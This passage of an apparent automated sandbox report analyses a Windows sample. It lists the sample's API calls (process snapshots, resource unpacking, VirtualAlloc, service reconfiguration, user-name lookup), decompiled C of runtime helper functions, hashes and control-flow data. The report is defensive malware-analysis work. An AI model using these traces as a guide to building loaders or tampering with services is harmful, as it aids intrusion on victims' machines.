                                                                      0x00401d40
                                                                      0x00000000
                                                                      0x00401d42
                                                                      0x00401d42
                                                                      0x00401d45
                                                                      0x00401d48
                                                                      0x00401d4a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401d4a
                                                                      0x00401d40
                                                                      0x00401d55
                                                                      0x00401d55
                                                                      0x00401d57
                                                                      0x00000000
                                                                      0x00401d5d
                                                                      0x00401d6a
                                                                      0x00401d6f
                                                                      0x00401d72
                                                                      0x00401d74
                                                                      0x00401d80
                                                                      0x00401d80
                                                                      0x00401d82
                                                                      0x00401d84
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401d86
                                                                      0x00401d88
                                                                      0x00401d9c
                                                                      0x00401d9c
                                                                      0x00401d8a
                                                                      0x00401d8a
                                                                      0x00401d8d
                                                                      0x00401d90
                                                                      0x00000000
                                                                      0x00401d92
                                                                      0x00401d92
                                                                      0x00401d95
                                                                      0x00401d98
                                                                      0x00401d9a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401d9a
                                                                      0x00401d90
                                                                      0x00401da5
                                                                      0x00401da5
                                                                      0x00401da7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401da7
                                                                      0x00401da0
                                                                      0x00401da2
                                                                      0x00000000
                                                                      0x00401da2
                                                                      0x00000000
                                                                      0x00401d57
                                                                      0x00401d50
                                                                      0x00401d52
                                                                      0x00000000
                                                                      0x00401dad
                                                                      0x00401db6
                                                                      0x00401dbb
                                                                      0x00401dbb
                                                                      0x00401d10
                                                                      0x00000000
                                                                      0x00401d09
                                                                      0x00000000
                                                                      0x00401cf7
                                                                      0x00401cf0
                                                                      0x00401cf2
                                                                      0x00000000
                                                                      0x00401c9c
                                                                      0x00401c9c
                                                                      0x00401c9d
                                                                      0x00401caf
                                                                      0x00401caf
                                                                      0x00000000
                                                                      0x00401c9a
                                                                      0x00401c93
                                                                      0x00401c95
                                                                      0x00000000
                                                                      0x00401c95
                                                                      0x00401c4f
                                                                      0x00000000

APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
• Module32Next.KERNEL32 ref: 00401D02
• Module32Next.KERNEL32 ref: 00401DB6
• CloseHandle.KERNEL32(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
Strings
Memory Dump Source
• Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPKs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                      • API String ID: 1430744539-892703413
                                                                      • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                      • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      [Control-flow graph figure; call labelled on its nodes: GetPEB]
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .$GetProcAddress.$l
                                                                      • API String ID: 0-2784972518
                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                      • Instruction ID: c7459638c87ba179e0e09c491d186f62b7a5d7d100fc19adb48b8d00ba977644
                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                      • Instruction Fuzzy Hash: 9F3148B6900609DFDB10CF99C884AEEBBF9FF48324F24514AD841A7291D771FA45CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      [Control-flow graph figure; API call labelled on its nodes: ChangeServiceConfigA]
                                                                      APIs
                                                                      • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0239A4A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeConfigService
                                                                      • String ID:
                                                                      • API String ID: 3849694230-0
                                                                      • Opcode ID: ec81c34a96aeb302b7a0b66f819a702b457f5260884df7dc428aa9e5c1e65384
                                                                      • Instruction ID: d9489655544dd98ca6f6ac78981c9ffeb7f80f8e7916cb1b79ca834205d702bd
                                                                      • Opcode Fuzzy Hash: ec81c34a96aeb302b7a0b66f819a702b457f5260884df7dc428aa9e5c1e65384
                                                                      • Instruction Fuzzy Hash: 2AC14A71E106198FDF10CFA8C9857AEBBF2BF46314F148669E895E7284DB749881CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      [Control-flow graph figure; API call labelled on its nodes: GetUserNameA]
                                                                      APIs
                                                                      • GetUserNameA.ADVAPI32(00000000), ref: 023997F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: e695b405e90c046c24e3e58f2d2d0688e90649715e9aa3fa2751e77d430a487d
                                                                      • Instruction ID: 2c0fbe14fbcd8d4d1818b44e0b46ce6d8d2838a3b13ae0ef4c23b529608eccbf
                                                                      • Opcode Fuzzy Hash: e695b405e90c046c24e3e58f2d2d0688e90649715e9aa3fa2751e77d430a487d
                                                                      • Instruction Fuzzy Hash: E9512374D002088FDB18CFA9C984B9EBBF6AF49304F24C02DE816AB295DB759945CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      [Control-flow graph figure; API calls labelled on its nodes: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA]
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: cess$kernel32.dll
                                                                      • API String ID: 4275171209-1230238691
                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      C-Code - Quality: 63%
                                                                      			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v4;
                                                                      				signed int _v16;
                                                                      				signed int _v40;
                                                                      				void* _t14;
                                                                      				signed int _t15;
                                                                      				intOrPtr* _t21;
                                                                      				signed int _t24;
                                                                      				void* _t28;
                                                                      				void* _t39;
                                                                      				void* _t40;
                                                                      				signed int _t42;
                                                                      				void* _t45;
                                                                      				void* _t47;
                                                                      				void* _t51;
                                                                      
                                                                      				_t40 = __edi;
                                                                      				_t28 = __ebx;
                                                                      				_t45 = _t51;
                                                                      				while(1) {
                                                                      					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                      					if(_t14 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t15 = E0040D2E3(_a4);
                                                                      					__eflags = _t15;
                                                                      					if(_t15 == 0) {
                                                                      						__eflags =  *0x423490 & 0x00000001;
                                                                      						if(( *0x423490 & 0x00000001) == 0) {
                                                                      							 *0x423490 =  *0x423490 | 0x00000001;
                                                                      							__eflags =  *0x423490;
                                                                      							E0040AEFC(0x423484);
                                                                      							E0040D2BD( *0x423490, 0x41a704);
                                                                      						}
                                                                      						E0040AF49( &_v16, 0x423484);
                                                                      						E0040CD39( &_v16, 0x420fa4);
                                                                      						asm("int3");
                                                                      						_t47 = _t45;
                                                                      						_push(_t47);
                                                                      						_push(0xc);
                                                                      						_push(0x420ff8);
                                                                      						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                      						_t42 = _v4;
                                                                      						__eflags = _t42;
                                                                      						if(_t42 != 0) {
                                                                      							__eflags =  *0x4250b0 - 3;
                                                                      							if( *0x4250b0 != 3) {
                                                                      								_push(_t42);
                                                                      								goto L16;
                                                                      							} else {
                                                                      								E0040D6E0(_t28, 4);
                                                                      								_v16 = _v16 & 0x00000000;
                                                                      								_t24 = E0040D713(_t42);
                                                                      								_v40 = _t24;
                                                                      								__eflags = _t24;
                                                                      								if(_t24 != 0) {
                                                                      									_push(_t42);
                                                                      									_push(_t24);
                                                                      									E0040D743();
                                                                      								}
                                                                      								_v16 = 0xfffffffe;
                                                                      								_t19 = E0040B70B();
                                                                      								__eflags = _v40;
                                                                      								if(_v40 == 0) {
                                                                      									_push(_v4);
                                                                      									L16:
                                                                      									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                      									if(__eflags == 0) {
                                                                      										_t21 = E0040BFC1(__eflags);
                                                                      										 *_t21 = E0040BF7F(GetLastError());
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						return E0040E21D(_t19);
                                                                      					} else {
                                                                      						continue;
                                                                      					}
                                                                      					L19:
                                                                      				}
                                                                      				return _t14;
                                                                      				goto L19;
                                                                      			}

                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1411284514-0
                                                                      • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                      • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 260 405a20-405a2e 261 405a34-405a38 260->261 262 405c5c-405c63 260->262 261->262 263 405a3e-405a47 261->263 264 405c57-405c5b 263->264 265 405a4d-405a4f 263->265 265->264 266 405a55-405a58 265->266 267 405a5a-405a5e 266->267 268 405a5f-405a6f 266->268 269 405a71-405a74 268->269 270 405a9f-405aa3 268->270 269->270 273 405a76-405a95 269->273 271 405aa9 270->271 272 405c1c-405c37 call 403080 270->272 274 405ab0-405ab4 271->274 284 405c39-405c3f 272->284 285 405c4e-405c56 272->285 273->270 276 405a97-405a9e 273->276 277 405bb3-405bbb 274->277 278 405aba-405abe 274->278 282 405bbd 277->282 283 405bbf-405bc1 277->283 280 405ac0-405ac4 278->280 281 405b0f-405b38 call 4073a0 278->281 280->281 286 405ac6-405aed call 40bfc1 call 40bf62 280->286 299 405b3a-405b5d call 403080 call 4055e0 281->299 300 405b8e-405b92 281->300 282->283 289 405be0-405be5 283->289 290 405bc3-405bdd call 40b350 283->290 287 405c41-405c44 284->287 288 405c46-405c4d 284->288 313 405b0a-405b0d 286->313 314 405aef-405b04 call 40bc8e 286->314 287->285 287->288 295 405be7-405bf7 call 40bf62 289->295 296 405bfa-405c05 289->296 290->289 295->296 297 405c07 296->297 298 405c0e-405c14 296->298 297->298 317 405baa-405bb1 299->317 318 405b5f-405b71 call 4055e0 call 405000 299->318 300->272 304 405b98-405b9c 300->304 304->272 308 405b9e-405ba2 304->308 308->274 311 405ba8 308->311 311->272 313->281 314->313 321 405c15 314->321 317->272 318->272 325 405b77-405b78 call 4070f0 318->325 321->272 327 405b7d-405b8b call 403080 325->327 327->300
                                                                      C-Code - Quality: 98%
                                                                      			E00405A20(signed int __edx, intOrPtr* _a4, char* _a8, signed int _a12) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				char* _t78;
                                                                      				signed int _t82;
                                                                      				signed int _t84;
                                                                      				signed int _t85;
                                                                      				signed int _t86;
                                                                      				signed int _t87;
                                                                      				void* _t89;
                                                                      				signed int _t92;
                                                                      				signed int _t95;
                                                                      				signed int _t96;
                                                                      				signed int _t98;
                                                                      				signed int _t106;
                                                                      				char* _t110;
                                                                      				signed int _t115;
                                                                      				signed int _t116;
                                                                      				signed int _t124;
                                                                      				char* _t133;
                                                                      				signed int _t134;
                                                                      				intOrPtr* _t135;
                                                                      				signed int _t136;
                                                                      				signed int _t138;
                                                                      				signed int _t141;
                                                                      				void* _t144;
                                                                      
                                                                      				_t78 = _a8;
                                                                      				_t135 = _a4;
                                                                      				_t133 = _t78;
                                                                      				if(_t135 == 0 ||  *((char*)(_t135 + 0x5c)) != 0x72) {
                                                                      					return 0xfffffffe;
                                                                      				} else {
                                                                      					_t115 =  *(_t135 + 0x38);
                                                                      					_t124 = __edx | 0xffffffff;
                                                                      					if(_t115 == 0xfffffffd || _t115 == _t124) {
                                                                      						return _t124;
                                                                      					} else {
                                                                      						if(_t115 != 1) {
                                                                      							_t138 = _a12;
                                                                      							_t110 = _t78;
                                                                      							 *((intOrPtr*)(_t135 + 0xc)) = _t78;
                                                                      							 *(_t135 + 0x10) = _t138;
                                                                      							__eflags = _t138;
                                                                      							if(_t138 == 0) {
                                                                      								L10:
                                                                      								__eflags =  *(_t135 + 0x10);
                                                                      								if( *(_t135 + 0x10) == 0) {
                                                                      									L37:
                                                                      									_t82 = E00403080( *(_t135 + 0x4c), _t133,  *((intOrPtr*)(_t135 + 0xc)) - _t133);
                                                                      									_t116 =  *(_t135 + 0x10);
                                                                      									 *(_t135 + 0x4c) = _t82;
                                                                      									__eflags = _t138 - _t116;
                                                                      									if(_t138 != _t116) {
                                                                      										L41:
                                                                      										_t84 = _t138 - _t116;
                                                                      										__eflags = _t84;
                                                                      										return _t84;
                                                                      									} else {
                                                                      										_t136 =  *(_t135 + 0x38);
                                                                      										__eflags = _t136 - 0xfffffffd;
                                                                      										if(_t136 == 0xfffffffd) {
                                                                      											L40:
                                                                      											_t85 = _t82 | 0xffffffff;
                                                                      											__eflags = _t85;
                                                                      											return _t85;
                                                                      										} else {
                                                                      											__eflags = _t136 - 0xffffffff;
                                                                      											if(_t136 != 0xffffffff) {
                                                                      												goto L41;
                                                                      											} else {
                                                                      												goto L40;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									while(1) {
                                                                      										__eflags =  *(_t135 + 0x58);
                                                                      										if( *(_t135 + 0x58) != 0) {
                                                                      											break;
                                                                      										}
                                                                      										__eflags =  *(_t135 + 4);
                                                                      										if( *(_t135 + 4) != 0) {
                                                                      											L18:
                                                                      											 *((intOrPtr*)(_t135 + 0x64)) =  *((intOrPtr*)(_t135 + 0x64)) +  *(_t135 + 4);
                                                                      											 *((intOrPtr*)(_t135 + 0x68)) =  *((intOrPtr*)(_t135 + 0x68)) +  *(_t135 + 0x10);
                                                                      											_push(0);
                                                                      											_push(_t135);
                                                                      											_t92 = E004073A0();
                                                                      											 *((intOrPtr*)(_t135 + 0x64)) =  *((intOrPtr*)(_t135 + 0x64)) -  *(_t135 + 4);
                                                                      											 *((intOrPtr*)(_t135 + 0x68)) =  *((intOrPtr*)(_t135 + 0x68)) -  *(_t135 + 0x10);
                                                                      											_t144 = _t144 + 8;
                                                                      											 *(_t135 + 0x38) = _t92;
                                                                      											__eflags = _t92 - 1;
                                                                      											if(_t92 != 1) {
                                                                      												L22:
                                                                      												__eflags =  *(_t135 + 0x38);
                                                                      												if( *(_t135 + 0x38) != 0) {
                                                                      													goto L37;
                                                                      												} else {
                                                                      													__eflags =  *(_t135 + 0x3c);
                                                                      													if( *(_t135 + 0x3c) != 0) {
                                                                      														goto L37;
                                                                      													} else {
                                                                      														__eflags =  *(_t135 + 0x10);
                                                                      														if( *(_t135 + 0x10) != 0) {
                                                                      															continue;
                                                                      														} else {
                                                                      															goto L37;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												_t98 = E00403080( *(_t135 + 0x4c), _t133,  *((intOrPtr*)(_t135 + 0xc)) - _t133);
                                                                      												_t133 =  *((intOrPtr*)(_t135 + 0xc));
                                                                      												 *(_t135 + 0x4c) = _t98;
                                                                      												_t144 = _t144 + 0xc;
                                                                      												__eflags = E004055E0(_t135, __eflags) -  *(_t135 + 0x4c);
                                                                      												if(__eflags != 0) {
                                                                      													 *(_t135 + 0x38) = 0xfffffffd;
                                                                      													goto L37;
                                                                      												} else {
                                                                      													E004055E0(_t135, __eflags);
                                                                      													E00405000(_t135, _t110);
                                                                      													__eflags =  *(_t135 + 0x38);
                                                                      													if( *(_t135 + 0x38) != 0) {
                                                                      														goto L37;
                                                                      													} else {
                                                                      														E004070F0(_t135); // executed
                                                                      														_t106 = E00403080(0, 0, "true");
                                                                      														_t144 = _t144 + 0x10;
                                                                      														 *(_t135 + 0x4c) = _t106;
                                                                      														goto L22;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											__eflags =  *(_t135 + 0x3c);
                                                                      											if(__eflags != 0) {
                                                                      												goto L18;
                                                                      											} else {
                                                                      												 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                      												_t95 = E0040BF62( *((intOrPtr*)(_t135 + 0x44)), 1, 0x4000,  *((intOrPtr*)(_t135 + 0x40)));
                                                                      												_t144 = _t144 + 0x10;
                                                                      												 *(_t135 + 4) = _t95;
                                                                      												__eflags = _t95;
                                                                      												if(_t95 != 0) {
                                                                      													L17:
                                                                      													 *_t135 =  *((intOrPtr*)(_t135 + 0x44));
                                                                      													goto L18;
                                                                      												} else {
                                                                      													 *(_t135 + 0x3c) = 1;
                                                                      													_t96 = E0040BC8E( *((intOrPtr*)(_t135 + 0x40)));
                                                                      													_t144 = _t144 + 4;
                                                                      													__eflags = _t96;
                                                                      													if(_t96 != 0) {
                                                                      														 *(_t135 + 0x38) = 0xffffffff;
                                                                      														goto L37;
                                                                      													} else {
                                                                      														goto L17;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										goto L44;
                                                                      									}
                                                                      									_t134 =  *(_t135 + 4);
                                                                      									_t86 =  *(_t135 + 0x10);
                                                                      									__eflags = _t134 - _t86;
                                                                      									if(_t134 > _t86) {
                                                                      										_t134 = _t86;
                                                                      									}
                                                                      									__eflags = _t134;
                                                                      									if(_t134 > 0) {
                                                                      										E0040B350(_t110, _t134, _t135,  *((intOrPtr*)(_t135 + 0xc)),  *_t135, _t134);
                                                                      										 *_t135 =  *_t135 + _t134;
                                                                      										 *(_t135 + 0x10) =  *(_t135 + 0x10) - _t134;
                                                                      										_t110 = _t110 + _t134;
                                                                      										_t144 = _t144 + 0xc;
                                                                      										_t59 = _t135 + 4;
                                                                      										 *_t59 =  *(_t135 + 4) - _t134;
                                                                      										__eflags =  *_t59;
                                                                      										 *((intOrPtr*)(_t135 + 0xc)) = _t110;
                                                                      									}
                                                                      									_t87 =  *(_t135 + 0x10);
                                                                      									__eflags = _t87;
                                                                      									if(_t87 > 0) {
                                                                      										_t89 = E0040BF62(_t110, 1, _t87,  *((intOrPtr*)(_t135 + 0x40)));
                                                                      										_t64 = _t135 + 0x10;
                                                                      										 *_t64 =  *(_t135 + 0x10) - _t89;
                                                                      										__eflags =  *_t64;
                                                                      									}
                                                                      									_t141 = _t138 -  *(_t135 + 0x10);
                                                                      									 *((intOrPtr*)(_t135 + 0x64)) =  *((intOrPtr*)(_t135 + 0x64)) + _t141;
                                                                      									 *((intOrPtr*)(_t135 + 0x68)) =  *((intOrPtr*)(_t135 + 0x68)) + _t141;
                                                                      									__eflags = _t141;
                                                                      									if(_t141 == 0) {
                                                                      										 *(_t135 + 0x3c) = 1;
                                                                      									}
                                                                      									return _t141;
                                                                      								}
                                                                      							} else {
                                                                      								__eflags =  *(_t135 + 0x6c) - _t124;
                                                                      								if( *(_t135 + 0x6c) == _t124) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									 *_t78 =  *(_t135 + 0x6c);
                                                                      									 *(_t135 + 0x10) =  *(_t135 + 0x10) + _t124;
                                                                      									_t110 = _t78 + 1;
                                                                      									 *((intOrPtr*)(_t135 + 0xc)) =  *((intOrPtr*)(_t135 + 0xc)) + 1;
                                                                      									 *((intOrPtr*)(_t135 + 0x68)) =  *((intOrPtr*)(_t135 + 0x68)) + 1;
                                                                      									__eflags =  *(_t135 + 0x70);
                                                                      									 *(_t135 + 0x6c) = _t124;
                                                                      									_t133 = _t110;
                                                                      									if( *(_t135 + 0x70) == 0) {
                                                                      										goto L10;
                                                                      									} else {
                                                                      										 *(_t135 + 0x38) = 1;
                                                                      										return 1;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							return 0;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L44:
                                                                      			}

                                                                      0x00405b92
                                                                      0x00000000
                                                                      0x00405b98
                                                                      0x00405b98
                                                                      0x00405b9c
                                                                      0x00000000
                                                                      0x00405b9e
                                                                      0x00405b9e
                                                                      0x00405ba2
                                                                      0x00000000
                                                                      0x00405ba8
                                                                      0x00000000
                                                                      0x00405ba8
                                                                      0x00405ba2
                                                                      0x00405b9c
                                                                      0x00405b3a
                                                                      0x00405b45
                                                                      0x00405b4a
                                                                      0x00405b4d
                                                                      0x00405b50
                                                                      0x00405b5a
                                                                      0x00405b5d
                                                                      0x00405baa
                                                                      0x00000000
                                                                      0x00405b5f
                                                                      0x00405b61
                                                                      0x00405b68
                                                                      0x00405b6d
                                                                      0x00405b71
                                                                      0x00000000
                                                                      0x00405b77
                                                                      0x00405b78
                                                                      0x00405b83
                                                                      0x00405b88
                                                                      0x00405b8b
                                                                      0x00000000
                                                                      0x00405b8b
                                                                      0x00405b71
                                                                      0x00405b5d
                                                                      0x00405ac0
                                                                      0x00405ac0
                                                                      0x00405ac4
                                                                      0x00000000
                                                                      0x00405ac6
                                                                      0x00405acb
                                                                      0x00405ae0
                                                                      0x00405ae5
                                                                      0x00405ae8
                                                                      0x00405aeb
                                                                      0x00405aed
                                                                      0x00405b0a
                                                                      0x00405b0d
                                                                      0x00000000
                                                                      0x00405aef
                                                                      0x00405af3
                                                                      0x00405afa
                                                                      0x00405aff
                                                                      0x00405b02
                                                                      0x00405b04
                                                                      0x00405c15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b04
                                                                      0x00405aed
                                                                      0x00405ac4
                                                                      0x00000000
                                                                      0x00405abe
                                                                      0x00405bb3
                                                                      0x00405bb6
                                                                      0x00405bb9
                                                                      0x00405bbb
                                                                      0x00405bbd
                                                                      0x00405bbd
                                                                      0x00405bbf
                                                                      0x00405bc1
                                                                      0x00405bcb
                                                                      0x00405bd0
                                                                      0x00405bd2
                                                                      0x00405bd5
                                                                      0x00405bd7
                                                                      0x00405bda
                                                                      0x00405bda
                                                                      0x00405bda
                                                                      0x00405bdd
                                                                      0x00405bdd
                                                                      0x00405be0
                                                                      0x00405be3
                                                                      0x00405be5
                                                                      0x00405bef
                                                                      0x00405bf7
                                                                      0x00405bf7
                                                                      0x00405bf7
                                                                      0x00405bf7
                                                                      0x00405bfa
                                                                      0x00405bfd
                                                                      0x00405c00
                                                                      0x00405c03
                                                                      0x00405c05
                                                                      0x00405c07
                                                                      0x00405c07
                                                                      0x00405c14
                                                                      0x00405c14
                                                                      0x00405a71
                                                                      0x00405a71
                                                                      0x00405a74
                                                                      0x00000000
                                                                      0x00405a76
                                                                      0x00405a79
                                                                      0x00405a7b
                                                                      0x00405a7e
                                                                      0x00405a86
                                                                      0x00405a89
                                                                      0x00405a8c
                                                                      0x00405a90
                                                                      0x00405a93
                                                                      0x00405a95
                                                                      0x00000000
                                                                      0x00405a97
                                                                      0x00405a9a
                                                                      0x00405a9e
                                                                      0x00405a9e
                                                                      0x00405a95
                                                                      0x00405a74
                                                                      0x00405a5b
                                                                      0x00405a5e
                                                                      0x00405a5e
                                                                      0x00405a58
                                                                      0x00405a47
                                                                      0x00000000

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b084eca792c7b7879e2cade4dd6ea029dcc7911505801cb43ceb0c5d904e76dd
                                                                      • Instruction ID: 168e27a369536ec56344fe0227db1249f7596168985b86e43d145dbb19a92fe0
                                                                      • Opcode Fuzzy Hash: b084eca792c7b7879e2cade4dd6ea029dcc7911505801cb43ceb0c5d904e76dd
                                                                      • Instruction Fuzzy Hash: E4713C71604B008FE7309E29D844667B7E4EF80324F148A2EE5A697BD0D779F8858F89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 347 5b0e0f-5b0e24 SetErrorMode * 2 348 5b0e2b-5b0e2c 347->348 349 5b0e26 347->349 349->348
                                                                      APIs
